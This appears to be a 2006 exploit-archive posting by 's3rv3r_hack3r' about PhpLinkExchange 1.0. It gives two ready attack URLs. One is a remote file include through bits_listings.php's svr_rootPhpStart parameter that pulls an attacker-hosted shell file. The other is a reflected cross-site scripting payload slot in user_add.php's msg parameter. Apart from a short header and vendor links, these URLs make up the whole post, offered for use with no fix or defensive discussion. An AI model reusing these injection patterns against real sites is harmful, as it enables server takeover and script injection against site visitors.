PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities
# Published : 2006-09-11
# Author : s3rv3r_hack3r
# Previous Title : WTools 0.0.1a (include_path) Remote File Include Vulnerability
# Next Title : phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit

vendor :www.idevspot.com

Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]

# www.Syue.com [2006-09-11]